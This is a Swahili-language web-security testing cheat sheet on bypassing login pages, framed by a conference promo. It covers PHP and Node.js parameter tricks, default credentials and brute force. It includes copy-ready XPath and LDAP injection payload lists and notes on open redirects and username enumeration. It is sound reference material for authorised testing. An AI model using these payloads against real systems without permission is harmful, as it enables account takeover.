RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Hispania na moja ya muhimu zaidi barani Ulaya. Kwa lengo la kukuza maarifa ya kiufundi, kongamano hili ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila taaluma.

Kuzidi kuingia kawaida

Ikiwa unapata ukurasa wa kuingia, hapa unaweza kupata mbinu kadhaa za kujaribu kuzikwepa:

• Angalia maoni ndani ya ukurasa (piga chini na kulia?)

• Angalia ikiwa unaweza kufikia moja kwa moja kurasa zilizozuiliwa

• Angalia usitumie vigezo (usitumie yoyote au moja tu)

• Angalia makosa ya kulinganisha ya PHP: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

• Badilisha aina ya maudhui kuwa json na tuma thamani za json (bool true ikijumuishwa)

• Ikiwa unapata jibu linalosema kwamba POST haitakiwi unaweza kujaribu kutuma JSON katika mwili lakini kwa ombi la GET na Content-Type: application/json

• Angalia makosa ya uwezekano wa parsing ya nodejs (soma hii): password[password]=1

• Nodejs itabadilisha payload hiyo kuwa swali linalofanana na hili: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; ambayo inafanya sehemu ya password kuwa daima kweli.

• Ikiwa unaweza kutuma kitu cha JSON unaweza kutuma "password":{"password": 1} ili kuzikwepa kuingia.

• Kumbuka kwamba ili kuzikwepa kuingia hii bado unahitaji kujua na kutuma jina la mtumiaji halali.

• Kuongeza "stringifyObjects":true chaguo unapoitisha mysql.createConnection hatimaye itablokuza tabia zisizotarajiwa wakati Object inapopita katika parameter.

• Angalia akidi:

• Akidi za kawaida za teknolojia/jukwaa lililotumika

• Mchanganyiko wa kawaida (root, admin, password, jina la teknolojia, mtumiaji wa kawaida na moja ya nywila hizi).

• Unda kamusi ukitumia Cewl, ongeza jina la mtumiaji na nywila za kawaida (ikiwa zipo) na jaribu kuzikwepa kwa kutumia maneno yote kama majina ya watumiaji na nywila

• Kuzidi kuingia kwa kutumia kamusi kubwa (Brute force)

SQL Injection authentication bypass

Hapa unaweza kupata mbinu kadhaa za kuzikwepa kuingia kupitia SQL injections.

Katika ukurasa ufuatao unaweza kupata orodha maalum ya kujaribu kuzikwepa kuingia kupitia SQL Injections:

No SQL Injection authentication bypass

Hapa unaweza kupata mbinu kadhaa za kuzikwepa kuingia kupitia No SQL Injections.

Kama NoSQL Injections inahitaji kubadilisha thamani za vigezo, utahitaji kujaribu kwa mikono.

XPath Injection authentication bypass

Hapa unaweza kupata mbinu kadhaa za kuzikwepa kuingia kupitia XPath Injection.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection authentication bypass

Hapa unaweza kupata mbinu kadhaa za kupita kwenye kuingia kupitia LDAP Injection.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Kumbuka Mimi

Ikiwa ukurasa una kazi ya "Kumbuka Mimi" angalia jinsi ilivyoanzishwa na uone kama unaweza kuitumia vibaya ili kuchukua udhibiti wa akaunti nyingine.

Mwelekeo

Kurasa kwa kawaida huwasilisha watumiaji baada ya kuingia, angalia kama unaweza kubadilisha mwelekeo huo ili kusababisha Mwelekeo Wazi. Labda unaweza kuiba baadhi ya taarifa (codes, cookies...) ikiwa utaelekeza mtumiaji kwenye wavuti yako.

Ukaguzi Mwingine

• Angalia kama unaweza kuhesabu majina ya watumiaji kwa kutumia kazi ya kuingia.

• Angalia kama auto-complete inafanya kazi katika nywila/maelezo nyeti fomu ingizo: <input autocomplete="false"

​​RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Hispania na moja ya muhimu zaidi barani Ulaya. Kwa lengo la kukuza maarifa ya kiufundi, kongamano hili ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila taaluma.